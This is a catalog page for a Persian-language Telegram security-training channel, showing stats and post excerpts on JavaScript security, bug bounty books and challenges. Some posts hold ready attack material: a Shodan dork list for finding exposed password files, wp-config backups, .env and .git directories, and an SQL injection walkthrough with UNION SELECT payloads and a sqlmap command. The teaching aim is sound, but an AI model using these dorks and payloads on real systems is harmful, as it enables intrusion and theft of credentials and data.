tgindex
Security hint
@sec_hintВидеоперсидский

🔥Security training 🎯 قراره روشن کننده مسیرتون باشیم. یوتیوب: www.youtube.com/@sec_hint اپارات: aparat.com/sec_hint گیت‌هاب: https://github.com/sechint ادمین: @adm_sec_hint

Последний пост
19 февр.
Последнее чтение
15 авг.
Постов за неделю
0
Всего постов
38
Тип
открытый
Язык
персидский
Категория
Видео
В каталоге с
13 авг.
Подписчики
5 293
+12 за 2 дн.
Сутки
+7
+0,13%
Неделя
 
Месяц
 
Просмотров на пост
6 695
38 постов
Вовлечённость
126,5%
к подписчикам
Постов в день
0,0
всего 38
Упоминаний
0
каналов
Охват размещения
оценка
1/24сутки в ленте
1/48двое суток
1/72трое суток

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • 19 февр.4 37915125

    🔥 نکات مهمی درمورد JavaScript که باید یاد داشته باشید. میتونید با .obsidian فایل رو باز کنید اگر مشکلی بود بگید تا PDF کنم 🙂 #JavaScript #Security @Sec_Hint

  • 14 февр.4 6341027

    https://youtu.be/1Fd6ZjfAeHE?si=AwUUA6dlFGssnaz0 جالب بود ببینید شما هم... @Sec_Hint

  • 6 февр.4 6711142

    قبل از ماجرای قطعی اینترنت قرار بود یه چالش بزارم تا عید ... با اینکه پستش رو هم اماده کرده بودم دیگه نشد... خوب از الان شروع کنید و ببینیم تا عید چقدر میتونیم چالش هاش رو حل کنیم و سطحمون رو افزایش بدیم دوست داشتین پروفایل root-me تون رو به اشتراک بزارید تا متعهد به چالش کشیدن خودتون بشید😉 از روزی که این اسکرین رو گرفتم تا الان 14فک میکنم حل کردم www.root-me.org @Sec_Hint

  • 27 янв.5 1472050

    Web Application Security-Persian.pdf

  • 27 янв.4 09516361из web_articles

    Author: zarvan Language: Persian Telegram channel: @web_articles

  • 11 нояб.6 054498

    بیام با جنگو یک اپ کوچیک رو اموزش بدم ؟!🤔 بعدش میتونیم API هم روش تست کنیم🧐

  • 10 нояб.5 6541133

    به درخواست یکی از دوستان ویدیو XSS در YouTube برای اشنایی بیشتر با XSS, JavaScript https://youtu.be/s0GKrnTBxp0 #xss

  • 8 нояб.4 830822

    🕵️‍♂️ کد آسیب‌پذیر ! یه فرم ساده داریم که با fetch داده‌ها رو به سرور می‌فرسته 👇 (همون چیزی که خیلیا برای تماس یا ثبت‌نام استفاده می‌کنن) <form id="contactForm"> {% csrf_token %} {{ form.as_p }} <button type="submit">ارسال</button> </form> <div id…

  • 7 нояб.3 643767

    یه مدت خبری ازم نبود… ولی برگشتم 😎 توی این مدت درگیر کار و چندتا پروژه بودم، و مجبور شدم از دنیای مورد علاقه‌م — ساختن و کشف کردن — کمی فاصله بگیرم. حالا قراره دوباره از قدم‌های کوچیک شروع کنیم، آروم‌آروم رشد کنیم و یکی‌یکی پله‌ها رو بالا بریم تا باهم چالش‌های دنیای وب رو پشت سر بذاریم. 🚀 خب یه سؤال! شما بک‌اند سایت‌ رو با چی شناختید یا شروع کردید؟ PHP 🔥 Flask, Django ❤️ .NET👻 یا فریم‌ورک‌های جاوااسکریپتی⚡️؟ با ریکشن نشون بدید ببینم کدوم یکی مخاطب بیشتری داره؟ میتونید نظرتون رو هم کامنت کنید😎

  • 5 нояб.4 1711234

    🕵️‍♂️ کد آسیب‌پذیر ! یه فرم ساده داریم که با fetch داده‌ها رو به سرور می‌فرسته 👇 (همون چیزی که خیلیا برای تماس یا ثبت‌نام استفاده می‌کنن) <form id="contactForm"> {% csrf_token %} {{ form.as_p }} <button type="submit">ارسال</button> </form> <div id="result"></div> <script> document.getElementById("contactForm").addEventListener("submit", function(e) { e.preventDefault(); fetch("{% url 'contact' %}", { method: "POST", body: new FormData(this), headers: { "X-Requested-With": "XMLHttpRequest" } }) .then(res => res.json()) .then(data => { document.getElementById("result").innerHTML = data.message; }); }); </script> ر ظاهر همه چیز خوبه، نه؟ 😎 اما این کد یه آسیب‌پذیری امنیتی داره که می‌تونه راه نفوذ رو برای حملات باز کنه 😬 💬 به نظرتون مشکل کجاست و چطور می‌شه برطرفش کرد؟ (جوابتونو توی کامنت‌ها بنویسین 👇) #Django #Python #security 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

  • 19 июн. 2025 г.6 76320197из web_articles

    Author: zarvan Language: Persian Telegram channel: @web_articles

  • برای روزایی ک شاید اینترنت نداشته باشید، عضو کانالش بشید و از منابع فارسیش استفاده کنید کتاب های مهم رو ترجمه میکنه ... @web_articles

  • 9 янв. 2025 г.14,1 тыс40472

    اگر جاوااسکریپت رو در حد قابل قبولی بلدید میتونید از این فایل استفاده کنید و موارد مورد نیاز امنیت در جاوااسکریپت رو یاد بگیرید... اگر چیزی از جاوااسکریپت نمیدونید بهتره با این فایل شروع نکنید. #javascript 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

  • 18 дек. 2024 г.13,5 тыс470

    видео или голосовое, без подписи

  • 18 дек. 2024 г.11 тыс20445

    📕معرفی دوتا کتاب عالی برای یادگیری Hacking API فقط اگر سطح زبان خوبی ندارید و نمیخاید خیلی وارد جزییات بشید و سر راست برید سر اصل مطلب پیشنهادم خوندن کتاب hacking API هست... من بیشتر باهاش ارتباط برقرار کردم تا کتاب API Security in Action 🤷🏼‍♀️ شما کدوم رو خوندی و پیشنهاد میدید؟! #API #hacking 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

  • همه چی در یک خط 🤔 ➖یک ریپازیتوری فوق‌العاده که مجموعه‌ای از One-Liners آماده رو ارائه می‌ده! با این دستورات کوتاه، می‌تونید subdomain‌ها رو جمع‌آوری کنید، آسیب‌پذیری‌ها رو شناسایی کنید، و کارهای دیگه‌ای که توی باگ‌بانتی نیاز دارید رو سریع انجام بدید. اگر دنبال ابزارهای سریع و کاربردی هستید، این دقیقاً همونه که لازم دارید. 🔗 لینک #Github #BugBounty 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

  • 🤑Shodan Secrets | Hack Hidden Files Easily 🛑Default Directory Listing http.html:"index of /" 🛑Backup Files http.html:"index of /" http.html:"backup" 🛑Compressed Achives http.html:"index of /" http.html:"tar.gz" 🛑Database Files http.html:"index of /" http.html:"database" http.html:"index of /" http.html:".sql" http.html:"index of /" http.html:".db" http.html:"index of /" http.html:"db_backup" http.html:"index of /" http.html:"mysql.dump" http.html:"index of /" http.html:".mdb" 🛑Configuration Files http.html:"index of /" http.html:"config.xml" 🛑Wordpress Configuration Files http.html:"index of /" http.html:"wp-config.php.txt" http.html:"index of /" http.html:"wp-config.txt" http.html:"index of /" http.html:"wp-config.php.bak" http.html:"index of /" http.html:"wp-config.php.old" http.html:"index of /" http.html:"wp-config.php.backup" http.html:"index of /" http.html:"wp-config.php.zip" http.html:"index of /" http.html:"wp-config.php.tar.gz" 🛑Passwords http.html:"index of /" http.html:"pwd" http.html:"index of /" http.html:"pass.txt" http.html:"index of /" http.html:"password" http.html:"index of /" http.html:"password.txt" http.html:"index of /" http.html:"passwords.txt" http.html:"index of /" http.html:"passwords.zip" 🛑Windows Server Config Files http.html:"index of /" http.html:"web.config" 🛑Exposed Logs http.html:"index of /" http.html:".log" http.html:"index of /" http.html:"access.log" http.html:"index of /" http.html:"error.log" http.html:"index of /" http.html:"php_error.log" http.html:"index of /" http.html:"debug.log" 🛑Configuration and Version Control Files http.html:"index of /" http.html:".env" http.html:"index of /" http.html:".svn" 🛑Git Repositories http.html:"index of /" http.html:".git" http.html:"index of /" http.html:"gitconfig" 📃 source #shodan #Dorks 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

  • 🚄راهنمای خوبی هست اگر هنوز سر اینکه از چی بخونم، از کجا بخونم مشکل دارید....🤔🤔 #BugBounty #book 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

  • 🔍 Bug Bounty Tips for Smart Hunters 🐞 #bugbounty #trip 🌐Sec_Hint

  • 🎯 چرا ' در Sql Injection نتیجه نمی‌دهد؟ ✅ ممکن است دلایل زیر مانع از نمایش نتیجه شوند: خطاها در سمت سرور نمایش داده نمی‌شوند (Error Handling فعال است). ورودی فیلتر شده و از بروز خطای SQL جلوگیری می‌شود. تزریق در پارامتر اشتباه انجام شده است. 1- تست Blind SQL Injection: 🔹 اگر خروجی مشخصی نمی‌بینید، ممکن است با Blind SQL Injection مواجه باشید. از این روش‌ها استفاده کنید: الف. Boolean-Based Injection: ?id=1 AND 1=1 -- (خروجی باید بدون تغییر باشد) ?id=1 AND 1=2 -- (خروجی باید تغییر کند یا صفحه خطا دهد) ب. Time-Based Injection: ?id=1 AND SLEEP(5) -- (صفحه باید با تأخیر بارگذاری شود) 2- شناسایی ستون‌ها با UNION ✅ تعداد ستون‌ها را با ORDER BY شناسایی کنید: ?id=1 ORDER BY 1-- ?id=1 ORDER BY 2-- وقتی به خطا رسیدید، تعداد ستون‌ها یک عدد کمتر از مقدار تست‌شده است. ✅ بعد از شناسایی تعداد ستون‌ها، از UNION SELECT استفاده کنید: ?id=1 UNION SELECT 1,2,3,4-- 3- پیدا کردن ستون‌های قابل مشاهده 🔹 برای پیدا کردن ستون‌هایی که خروجی آن‌ها در صفحه نمایش داده می‌شود: ?id=1 UNION SELECT 1,'test',3,4-- 🔑 وقتی مقدار 'test' نمایش داده شد، ستون قابل مشاهده است. 4- استخراج اطلاعات حساس ✅ نسخه پایگاه داده: ?id=1 UNION SELECT 1,@@version,3,4-- ?id=1 UNION SELECT 1,version(),3,4-- ✅ نام جداول موجود: ?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- استفاده از ابزارهای خودکار 💻 ابزار Sqlmap به شما کمک می‌کند که به‌صورت خودکار تزریق SQL را شناسایی و اطلاعات را استخراج کنید: sqlmap -u "http://example.com/page.php?id=1" --dbs #پنتست #SQLi #امنیت_سایبری #باگ_بانتی 📌 برای مطالب بیشتر و آموزش‌های تخصصی، کانال ما رو دنبال کنید! 🌐Sec_Hint & Boost & Youtube

Security hint — tgindex